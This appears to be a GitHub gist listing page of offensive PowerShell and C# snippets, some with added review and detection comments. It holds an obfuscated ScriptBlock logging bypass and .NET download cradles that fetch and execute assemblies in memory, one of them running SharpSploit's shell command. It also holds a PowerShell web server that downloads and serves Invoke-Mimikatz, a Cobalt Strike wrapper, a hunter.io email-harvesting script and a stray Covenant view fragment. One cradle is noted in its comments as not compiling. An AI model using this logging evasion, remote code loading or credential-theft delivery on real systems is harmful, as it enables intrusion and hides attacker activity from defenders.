
Ryan Cobb cobbr

@cobbr
cobbr / win_domain_child.ps1
Created April 2, 2024 20:58
win_domain_child
#!powershell
# Copyright: (c) 2022 Jordan Borean (@jborean93) jborean93@gmail.com
# Copyright: (c) 2023, Ryan Cobb <ryancobb65@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#AnsibleRequires -CsharpUtil Ansible.Basic
# win_domain_child module
@cobbr
cobbr / ScriptBlockLogBypass.ps1
Last active January 28, 2023 20:20
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
#
# What the visible lines do: reflection is used to read the non-public static
# field 'cachedGroupPolicySettings' on System.Management.Automation.Utils. If the
# returned cache holds a 'ScriptBlockLogging' entry, its 'EnableScriptBlockLogging'
# and 'EnableScriptBlockInvocationLogging' values are set to 0.
# Nothing visible here writes to the registry or to Group Policy; the change is
# made to the object returned by GetValue, i.e. state held by this process.
# NOTE(review): this listing is a truncated preview - the outer If block is not
# closed here and any further branch is not visible.
#
# Detection notes:
# - 'GetField', 'NonPublic,Static', 'ScriptBlockLogging' and
#   'EnableScriptBlockLogging' are split with a backtick or string concatenation,
#   so they never appear as contiguous literals. Rules that match those literals
#   need to normalise the text first, or key on the unsplit names that remain
#   ('cachedGroupPolicySettings', 'EnableScriptBlockInvocationLogging').
# - NOTE(review): where policy-enabled script block logging is active, the block
#   that performs this change is presumably recorded before it takes effect -
#   confirm for the PowerShell version in use.
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
# Guard: the field lookup returns nothing when the type does not expose this field.
If ($GroupPolicyField) {
# Static field, so no instance is passed to GetValue.
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
# Only acts when a ScriptBlockLogging entry already exists in the cache.
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
@cobbr
cobbr / DotnetAssemblyDownloadCradle.cs
Created June 20, 2018 22:37
A download cradle for .NET assemblies.
/// <summary>
/// Downloads raw bytes from the URL given in <c>args[0]</c>, loads them into the
/// current process as a .NET assembly, and invokes the first method of the first
/// type that assembly reports.
/// </summary>
/// <remarks>
/// Review notes:
/// the downloaded bytes go straight to <c>Assembly.Load(byte[])</c> with no hash,
/// signature or origin check, so whatever the URL serves is executed.
/// The assembly is loaded from a byte array rather than a file path, so nothing
/// in this code writes the payload to disk; monitoring has to cover the network
/// fetch and the in-memory load instead of a file drop.
/// NOTE(review): on .NET Framework 4.8 and later, byte-array assembly loads are
/// expected to be passed to AMSI - confirm for the runtime in use.
/// <c>args[0]</c> is read without a length check, and the type/method choice
/// depends on the order returned by <c>GetTypes()</c> and <c>GetMethods()</c>.
/// </remarks>
public class Program
{
    public static void Main(string[] args)
    {
        // Fetch the assembly image over the network; the URL comes from the command line.
        System.Net.WebClient client = new System.Net.WebClient();
        byte[] rawAssembly = client.DownloadData(args[0]);

        // Load from memory - no file path is involved in this call.
        System.Reflection.Assembly loaded = System.Reflection.Assembly.Load(rawAssembly);

        // First method of the first type, called with no arguments.
        System.Reflection.MethodInfo target = loaded.GetTypes()[0].GetMethods()[0];
        target.Invoke(0, null);
    }
}
@cobbr
cobbr / Invoke-ObfuscationDetection.ps1
Last active November 30, 2021 09:20
Detect obfuscated PowerShell through character frequency analysis.
function Measure-CharacterFrequency
{
<#
.SYNOPSIS
Measures the letter / character frequency in a block of text, ignoring whitespace
and PowerShell comment blocks.
Author: Lee Holmes
@cobbr
cobbr / hunter.py
Created December 7, 2018 22:07 — forked from Static-Flow/hunter.py
Simple Python 3 script to pull emails related to a domain from hunter.io and parse the data
import requests
import sys
if len(sys.argv) is 3:
domain = sys.argv[1]
api_key = sys.argv[2]
if domain is not None:
url = "https://hunter.io/v2/domain-search?limit=10000&offset=0&domain="\
+domain+"&api_key="+api_key+"&format=json"
hunterJsonData = requests.get(url)
for email in hunterJsonData.json()['data']['emails']:
// Downloads an assembly from a hard-coded HTTPS URL, loads it into the current
// process, looks up the type "SharpSploit.Execution.Shell" and its method
// "ShellExecute" by name, and invokes that method by reflection.
// NOTE(review): the downloaded bytes are handed to Assembly.Load with no hash or
// signature check, so the host at that URL fully controls what is executed.
// NOTE(review): `@("whoami", "", "", "")` is PowerShell array syntax, not C#;
// this listing does not compile as written.
// Detection note: the assembly is loaded from a byte array, not a file path, so
// review of this pattern should look at the outbound request and the in-memory
// load rather than at a file written to disk.
public class Program {
public static void Main() {
// GetType/GetMethod return null when the name is not found; no null check follows.
System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData("https://example.com/SharpSploit.dll")).GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute").Invoke(0, @("whoami", "", "", ""));
}
}
@cobbr
cobbr / server.ps1
Last active January 30, 2020 18:55 — forked from obscuresec/dirtywebserver.ps1
Dirty PowerShell Webserver
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8080/")
$Hso.Start()
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
$HRes.Headers.Add("Content-Type","text/plain")
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
$Buf = [Text.Encoding]::UTF8.GetBytes($mk)
@using Covenant.Core
@using Covenant.Models.Grunts
@model GruntTasking
@{
Layout = "_GruntTaskingLayout";
ViewData["Title"] = "Grunts";
}
<div class="d-flex justify-content-between flex-wrap flex-md-nowrap pb-2 mb-3">
<h1 class="h2">GruntTasking: <span id="tasking-name" class="text-primary">@Html.DisplayFor(model => model.Name)</span></h1>
</div>
@cobbr
cobbr / sharpgen.cna
Created November 8, 2018 19:03 — forked from dtmsecurity/sharpgen.cna
SharpGen Aggressor Beacon Wrapper
$dotnetpath = "/usr/local/share/dotnet/dotnet";
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll";
$temppath = "/tmp/";
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n");
alias sharpgen{
$executionId = "sharpgen_" . int(rand() * 100000);
$temporaryCsharp = $temppath . $executionId . ".cs";
$executableFilename = $temppath . $executionId . ".exe";
cobbr@mac:~/SharpGen > cp -r ~/GhostPack/SharpWMI/SharpWMI ./Source
cobbr@mac:~/SharpGen > cat example.txt
SharpWMI.Program.LocalWMIQuery("select * from win32_service");
Console.WriteLine(Host.GetProcessList());
cobbr@mac:~/SharpGen > dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe --source-file example.txt
...
[*] Compiled assembly written to: /Users/cobbr/SharpGen/Output/example.exe